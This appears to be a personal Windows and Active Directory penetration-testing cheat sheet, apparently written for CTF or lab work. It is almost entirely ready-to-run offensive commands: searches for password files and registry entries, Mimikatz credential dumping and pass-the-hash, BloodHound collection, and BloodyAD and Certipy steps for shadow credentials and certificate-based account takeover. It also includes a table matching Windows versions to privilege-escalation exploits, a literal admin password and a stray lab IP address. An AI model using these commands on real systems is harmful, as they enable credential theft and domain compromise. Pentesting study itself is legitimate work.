Windows

Enumeration

Basic Information

whoami                     # Current user
whoami /priv               # Privileges of current user
whoami /groups             # Groups the user belongs to

hostname                   # Machine hostname
systeminfo                 # OS version, patches, architecture

echo %USERDOMAIN%      # Current domain
echo %LOGONSERVER%     # Domain controller

wmic product get name,version # Installed software
wmic qfe get Caption,Description,HotFixID,InstalledOn # Shows installed patches

Users & Groups

net user                       # List local users
net user <username>            # Detailed user info

net localgroup                 # List local groups
net localgroup administrators  # Check admin group members

Network Information

ipconfig /all              # Network interfaces
route print                # Routing table
arp -a                     # ARP cache (local network devices)
netstat -ano               # Listening ports and connections

Running Processes & Services & Tasks

tasklist                   # Running processes
tasklist /svc              # Processes with associated services


sc query                   # List services
sc qc <service>            # Service configuration

wmic service list brief    # Alternative service listing

schtasks /query /fo LIST /v # Shows scheduled tasks

Interesting Files

dir /s /b C:\*.txt
dir /s /b C:\*.config
dir /s /b C:\*.xml
dir /s /b C:\*.ini


findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
findstr /spin "password" *.*

dir /s *pass* == *cred* == *vnc*

Saved Credentials

cmdkey /list
runas /savecred /user:Administrator cmd
set
reg query HKLM /f password /t REG_SZ /s

File Permissions

dir C:\                    # List root directories
icacls C:\path\file       # Check file permissions
icacls C:\ /T | findstr "Everyone:(F)"

Active Directory

Basic Enumeration

net user /domain #Enumerate Domain Users
net user <USER> /domain #Insepct Domain User
net group /domain #Enumerate Domain Groups
net group <GROUP> /domain #Enumerate Members of Groups

Tools

Winpeas

winPEAS.exe

Seatbelt

Seatbelt.exe all # Run all checks

# Run specific checks
Seatbelt.exe system
Seatbelt.exe user
Seatbelt.exe processes
Seatbelt.exe services

PowerUp & SharpUp (C# Version)

Import-Module .\PowerUp.ps1

Invoke-AllChecks # Run all checks

# Run specific checks
Invoke-ServiceAbuse
Get-UnquotedService
Get-ModifiableServiceFile
Get-ModifiableService

SharpUp.exe services
SharpUp.exe registry
SharpUp.exe tasks
SharpUp.exe audit

Mimikatz

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::lsa
sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:<HASH> /run:cmd.exe

PowerView

Import-Module .\PowerView.ps1
Get-DomainUser
Get-DomainComputer
Get-DomainGroupMember "Domain Admins"

Bloodhound

bloodhound-python -d <DOMAIN> -u '<USER>' -p '<PASS>' -dc '<DC FQDN>' -c all -ns <IP>


nxc ldap <DC FQDN> -u '<USER>' -p '<PASS>' --bloodhound --collection All --dns-server <IP>

.\SharpHound.exe -c All -d domain.local --zipfilename bloodhound.zip

Bloodhound Community Edition

./bloodhound-cli up
./bloodhound-cli down
http://localhost:8080/ui/explore

You can log in as `admin` with this password: z7B6XcwN9X5FJYO8l95bxEUSCXpKBTIP

Other

BloodyAD

bloodyAD -H <IP> -d <FQDN> -u 'USER' -p 'PASS'

add shadowCredentials <USER>
add groupMember '<GROUP>' <USER>
set object ALFRED servicePrincipleName -v 'http/fun'
set owner <USER> <-u user>

CertipyAD

certipy <COMMAND> -username <USER> -password '<PASS>' -account <NAME> -vulnerable -enabled -stdout

certipy account update -u '<USER>' -p <PASS> -dc-ip <IP> -user ca_svc -upn 'administrator'

certipy req -u '<USER>' -hashes <HASH> -dc-ip <IP> -target '<DC FQDN>' -ca '<DC FQDN CA>' -template 'User'

certipy auth -pfx administrator.pfx -domain '<FQDN>' -dc-ip <IP>
10.129.64.112
certipy shadow auto -u <USER>@<DOMAIN> -p '<PASS>' -account john -dc-ip <IP>

Common PrivEsc

Windows Version	Recommended Exploit
Windows 7 / 2008	JuicyPotato
Windows 8 / 2012	JuicyPotato / RoguePotato
Windows 10 1607‑1809	PrintSpoofer
Windows 10 1903+	RoguePotato / GodPotato
Windows 11 / Server 2022	GodPotato

HTTP Server

$listener = [System.Net.HttpListener]::new()
$listener.Prefixes.Add("http://*:8000/")
$listener.Start()
Write-Host "Serving HTTP on port 8000..."
while ($true) {
    $context = $listener.GetContext()
    $response = $context.Response
    $file = Join-Path -Path (Get-Location) -ChildPath $context.Request.RawUrl.TrimStart("/")
    if (Test-Path $file) {
        $bytes = [System.IO.File]::ReadAllBytes($file)
        $response.ContentLength64 = $bytes.Length
        $response.OutputStream.Write($bytes, 0, $bytes.Length)
    }
    $response.OutputStream.Close()
}